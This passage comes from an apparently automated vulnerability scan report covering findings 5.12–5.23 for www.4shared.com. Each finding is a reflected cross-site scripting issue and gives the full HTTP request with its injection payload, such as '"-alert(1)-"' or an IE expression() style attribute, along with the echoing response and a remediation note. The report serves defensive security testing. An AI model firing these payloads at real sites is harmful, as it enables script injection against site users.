This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /csscf1a6"-alert(1)-"93e9e1ca1ea/common.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /csscf1a6&quot;-alert(1)-&quot;93e9e1ca1ea/common.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9945AFA63F6156987186E12CABD47B3D.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:37 GMT
Content-Length: 36846


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/csscf1a6"-alert(1)-"93e9e1ca1ea/common.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.12. http://www.4shared.com/css/common.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/common.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51356"-alert(1)-"0c3edb7ca9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/common.css51356"-alert(1)-"0c3edb7ca9f HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/common.css51356&quot;-alert(1)-&quot;0c3edb7ca9f
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FF38715E34696F682B603791528F2490.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:48 GMT
Content-Length: 36833


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/common.css51356"-alert(1)-"0c3edb7ca9f";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.13. http://www.4shared.com/css/main.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17143"-alert(1)-"8e70496ad1f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css17143"-alert(1)-"8e70496ad1f/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css17143&quot;-alert(1)-&quot;8e70496ad1f/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C418A6718141B4DED03FB108B759A002.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:25 GMT
Content-Length: 36836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css17143"-alert(1)-"8e70496ad1f/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

5.14. http://www.4shared.com/css/main.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33c86"-alert(1)-"04029f7d211 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.css33c86"-alert(1)-"04029f7d211?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/main.css33c86&quot;-alert(1)-&quot;04029f7d211
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5DC79C3CAAAA22F8BA9BF7E8CB1C3AA7.dc7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:33 GMT
Content-Length: 36121


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/main.css33c86"-alert(1)-"04029f7d211";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.15. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f987f"-alert(1)-"dff384d2e3e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssf987f"-alert(1)-"dff384d2e3e/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /cssf987f&quot;-alert(1)-&quot;dff384d2e3e/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D3153B42395E4699F91C0059655651A4.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:43 GMT
Content-Length: 36901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/cssf987f"-alert(1)-"dff384d2e3e/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

5.16. http://www.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c20"-alert(1)-"0b7443b060a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.cssc7c20&quot;-alert(1)-&quot;0b7443b060a
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BA654DA392D19A26D4D4D21F2FB850BC.dc283; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:56:55 GMT
Content-Length: 36901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/css/mainWithoutCommon.cssc7c20"-alert(1)-"0b7443b060a";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.17. http://www.4shared.com/desktop/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /desktop/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb9b8"-alert(1)-"fce9bca0f19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /desktopeb9b8"-alert(1)-"fce9bca0f19/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /desktopeb9b8&quot;-alert(1)-&quot;fce9bca0f19/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C96FBC536CDE4E9B1B430C66668E2CE7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:02 GMT
Connection: close
Content-Length: 36103


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/desktopeb9b8"-alert(1)-"fce9bca0f19/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

5.18. http://www.4shared.com/enter.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4861a"-alert(1)-"6a1c01b4181 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /enter.jsp4861a"-alert(1)-"6a1c01b4181 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /enter.jsp4861a&quot;-alert(1)-&quot;6a1c01b4181
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4120E419A42EF4B824AB35C4C8D717A1.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:03 GMT
Connection: close
Content-Length: 36108


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/enter.jsp4861a"-alert(1)-"6a1c01b4181";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.19. http://www.4shared.com/enter.jsp [au parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The value of the au request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 was submitted in the au parameter. This input was echoed as 8fdd1"style="x:expression(alert(1))"f5d5aa7c370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /enter.jsp?sId=o2l1egVaZXKhvv6e&&fau=1&au=18fdd1"style%3d"x%3aexpression(alert(1))"f5d5aa7c370 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9028A42901C0BD18B84955937C69399A.dc278; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: ausk=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: ausk=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Thu, 24-Feb-2011 23:09:59 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:09:59 GMT
Connection: close
Content-Length: 33211


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or Si
...[SNIP]...
<input type="hidden" name="au" value="18fdd1"style="x:expression(alert(1))"f5d5aa7c370"/>
...[SNIP]...

5.20. http://www.4shared.com/faq.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /faq.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aae9"-alert(1)-"b86e0dc65d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /faq.jsp3aae9"-alert(1)-"b86e0dc65d2 HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /faq.jsp3aae9&quot;-alert(1)-&quot;b86e0dc65d2
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=66F969464FFE73FA334E29977412A1B7.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:04 GMT
Connection: close
Content-Length: 36098


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/faq.jsp3aae9"-alert(1)-"b86e0dc65d2";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.21. http://www.4shared.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4137e"-alert(1)-"30ce14ead11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico4137e"-alert(1)-"30ce14ead11 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=-477195441; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1133200866-1297862349616; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.1.10.1298497029; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278

Response

HTTP/1.1 404 /favicon.ico4137e&quot;-alert(1)-&quot;30ce14ead11
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:51:35 GMT
Content-Length: 36133


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.ico4137e"-alert(1)-"30ce14ead11";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

5.22. http://www.4shared.com/icons/16x16/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c041"-alert(1)-"b5aa33779a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons9c041"-alert(1)-"b5aa33779a/16x16/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adp=""; JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; afp=""; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hostid=-477195441; df=""; ppVisitDate=1298498361854; afu=""; ausk=""; __utma=210074320.1172937508.1297862350.1297862350.1298497029.2; __utmc=210074320; __utmb=210074320.2.10.1298497029; __qca=P0-1133200866-1297862349616; adu=""; dirPwdVerified=""; WWW_JSESSIONID=72833390295947212805B0C0BC19F5EA.dc278; ppVisited=%2FsignUpBox.jsp%3Fdf%3D%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert%280x0001BF%29%253C%2Fscript%253E%26login%3D3%26months%3D1%26password%3D3%26password2%3D3%26planSelect%3D1%26resetDirView%3D3;

Response

HTTP/1.1 404 /icons9c041&quot;-alert(1)-&quot;b5aa33779a/16x16/
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=10E3680EA5CFAB4BF9BFADD373585B14.dc278; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:10:34 GMT
Connection: close
Content-Length: 36118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/icons9c041"-alert(1)-"b5aa33779a/16x16/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
v
...[SNIP]...

5.23. http://www.4shared.com/icons/16x16/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /icons/16x16/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cc4"-alert(1)-"8ad53ce0672 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /icons/16x1634cc4"-alert(1)-"8ad53ce0672/ HTTP/1.1
Host: www.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
